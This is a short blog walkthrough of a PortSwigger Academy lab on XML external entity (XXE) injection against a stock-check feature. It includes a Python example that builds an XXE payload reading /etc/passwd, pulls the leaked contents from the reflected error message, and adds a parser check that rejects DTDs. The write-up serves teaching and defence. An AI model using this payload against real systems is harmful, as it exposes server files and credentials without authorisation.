Solving Portswigger Academy: Exploiting XXE using external entities to retrieve files

Vishal
2 min read · Sep 24, 2024

This lab has a “Check stock” feature that parses XML input and returns any unexpected values in the response.

To solve the lab, inject an XML external entity to retrieve the contents of the /etc/passwd file.

When you open the lab, you land on the shop's home page.

The vulnerability is in the Check stock feature, so open the View details page of any product. It has a Check stock button; click it and look at the request and response in Burp.

Screenshot: the Check stock request, whose body is XML, and its response

The request body is XML and the application reads the product and store IDs from it, so an XXE payload is the natural test. Send the request to Repeater and add a DOCTYPE that declares an external entity pointing at the target file, placed just before the root element (after the XML declaration), then reference that entity where a value is reflected back.

We test it first in the productId element and then in storeId.
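As an added example (not code from the original post), the stock-check body carrying the XXE payload, a helper that pulls the leaked file out of the reflected error message, and the server-side check that would have blocked the attack. The element names stockCheck, productId and storeId follow the lab's request; the "Invalid product ID: " response prefix and the sample response are assumptions for illustration.

```python
# Added example, not code from the original post. It builds the stock-check
# body carrying the XXE payload, pulls the leaked file out of the reflected
# response, and shows the server-side check that would have blocked the attack.
# Element names (stockCheck, productId, storeId) follow the lab's request; the
# "Invalid product ID: " response prefix is assumed from the lab's behaviour.
import re
import xml.etree.ElementTree as ET

# The benign stock-check body as the browser sends it (structure from the lab).
BENIGN_BODY = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>'
)


def build_xxe_body(path="/etc/passwd", store_id="1"):
    """Return the stock-check body with an external entity injected.

    The DOCTYPE sits between the XML declaration and the root element (the
    "just before the start of the tag" position), declares an external
    general entity pointing at a local file, and productId references it so
    the parser substitutes the file contents into the value the app reflects.
    """
    dtd = f'<!DOCTYPE stockCheck [<!ENTITY xxe SYSTEM "file://{path}">]>'
    return (
        '<?xml version="1.0" encoding="UTF-8"?>'
        f"{dtd}"
        "<stockCheck><productId>&xxe;</productId>"
        f"<storeId>{store_id}</storeId></stockCheck>"
    )


def extract_leak(response_text, prefix="Invalid product ID: "):
    """Return the reflected value from the app's error message, or None.

    The lab echoes unexpected productId values back after a fixed prefix
    (prefix assumed); once the entity is substituted, that echo is the file.
    """
    if not response_text.startswith(prefix):
        return None
    return response_text[len(prefix):]


# --- hardened server side -------------------------------------------------
# Refuse any DTD before the parser runs: no DOCTYPE, no entity declarations.
# Checking the raw bytes means no parser feature flag has to be trusted.
_DTD_RE = re.compile(rb"<!(DOCTYPE|ENTITY)\b", re.IGNORECASE)


def parse_stock_check(body: bytes) -> dict:
    """Parse a stock-check body, rejecting anything that declares a DTD."""
    if _DTD_RE.search(body):
        raise ValueError("DTD declarations are not allowed")
    root = ET.fromstring(body)
    if root.tag != "stockCheck":
        raise ValueError("unexpected root element")
    return {child.tag: (child.text or "") for child in root}


def is_blocked(body: bytes) -> bool:
    """True if the hardened parser refuses the body."""
    try:
        parse_stock_check(body)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    payload = build_xxe_body()
    print(payload)
    # Constructed sample of what the lab returns once the entity is resolved.
    sample_response = "Invalid product ID: root:x:0:0:root:/root:/bin/bash\n"
    print(extract_leak(sample_response))
    print(parse_stock_check(BENIGN_BODY.encode()))
    print(is_blocked(payload.encode()))
```

The reflection is the whole trick: the application copies an unexpected productId value into its error message, so whatever the entity expands to comes back in the response. The byte-level DTD check is a belt-and-braces guard; the real fix is to disable DTD and external entity processing in the XML parser the application uses.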

Screenshot: the response showing the contents of /etc/passwd retrieved through XXE

I also tested it in storeId, but it did not work.

This is how we solved the lab.
